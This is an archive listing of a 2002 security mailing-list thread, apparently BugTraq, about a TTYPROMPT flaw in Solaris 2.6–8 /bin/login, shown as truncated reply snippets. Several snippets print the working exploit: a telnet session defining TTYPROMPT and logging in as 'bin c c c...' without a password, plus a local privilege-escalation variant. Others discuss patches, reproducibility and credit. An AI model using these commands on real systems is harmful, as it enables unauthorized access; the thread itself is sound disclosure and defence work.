Re: Solaris 2.6, 7, 8

2002-10-05 Thread Sebastian
Hi. On Wed, Oct 02, 2002 at 12:00:38PM -0400, buzheng wrote: But, the remote setting of TTYPROMPT does matter. you can not succeed in login without remotely changing the TTYPROMPT. This is also the bug mentioned in Jonathan's original letter (bid:5531). Which is plain wrong. This may be

RE: Solaris 2.6, 7, 8

2002-10-04 Thread Morgan
This is nothing more than a newly disclosed way of exploiting an old bug, hardly newsworthy unless you're in the dot slash hacking business. In the spirit of giving credit where credit is due, I'd like to note that the bug was originally found by duke (ISS/ADM) of course. This method of

Re: Solaris 2.6, 7, 8

2002-10-03 Thread tb0b
On Wed, 02 Oct 2002, you wrote: But, the remote setting of TTYPROMPT does matter. you can not succeed in login without remotely changing the TTYPROMPT. This is also the bug mentioned in Jonathan's original letter (bid:5531). I have heard several conflicting reports on this matter and there

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Roy Kidder
Works like a champ on Solaris 2.6/Sparc: -- begin -- ~ $ telnet telnet environ define TTYPROMPT abcdef telnet o localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.6 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Dan Diamond
In-Reply-To: [EMAIL PROTECTED] This exploit can also be done locally to gain higher privs tester#TTYPROMPT=aa;export TTYPROMPT tester#exec login bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c/n tester:bin# Patches to resolve

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ido Dubrawsky
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote: Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ramon Kagan
Sorry but I can't reproduce this on a Solaris 7 machine. sunlight.ccs% telnet telnet environ define TTYPROMPT abcdef telnet o localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.7 login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Marco Ivaldi
On Wed, 2 Oct 2002, buzheng wrote: I do not think this is a new bug. I completely agree. But, the remote setting of TTYPROMPT does matter. you can not succeed in login without remotely changing the TTYPROMPT. This is also the bug mentioned in Jonathan's original letter (bid:5531). That's

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ramon Kagan
Another thing, if you tcpwrap your telnet sessions, you can prevent localhost telnets. Ramon Kagan York University, Computing and Network Services Unix Team - Intermediate System Administrator (416)736-2100 #20263 [EMAIL PROTECTED] - I have not failed. I

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Gert-Jan Hagenaars
Apparently, Dave Ahmad wrote: % % These may be fixes for this vulnerability, however they apply to telnetd % and this vulnerability has to be in login. So it makes more sense to apply the right patches to login, and not patches to telnetd. If you only want to install the necessary patches to

Solaris 2.6, 7, 8

2002-10-02 Thread Jonathan S
Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an

Re: Solaris 2.6, 7, 8

2002-10-02 Thread Dave Ahmad
I have confirmed this on a fresh Solaris 8/sparc install. Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c Last login: Wed Oct 2

Re: Solaris 2.6, 7, 8

2002-10-02 Thread buzheng
I do not think this is a new bug. Actually, the overflow is not at changing the ttyprompt remotely. In fact, if you just use a, instead of abcdef, as TTYPROMPT, it will still work. The overflow is that long user name with multiple spaces, all the c will be taken as environment. It is the very

Re: Solaris 2.6, 7, 8

2002-10-02 Thread Christopher X. Candreva
On Wed, 2 Oct 2002, Dave Ahmad wrote: I suggest that everyone here who still uses telnet disable it immediately. . . or install the latest Recommended patch cluster, which you should have done anyway. These may be fixes for this vulnerability, however they apply to telnetd and this

RE: Solaris 2.6, 7, 8

2002-10-02 Thread Sinan Eren
this finding's origin, I think credits must be given due... I'll be waiting for a clarification from Mr. Stuart. Thanks, sinan -Original Message- From: Jonathan S [mailto:[EMAIL PROTECTED]] Sent: Wednesday, October 02, 2002 9:13 AM To: [EMAIL PROTECTED] Subject: Solaris 2.6, 7, 8 Hello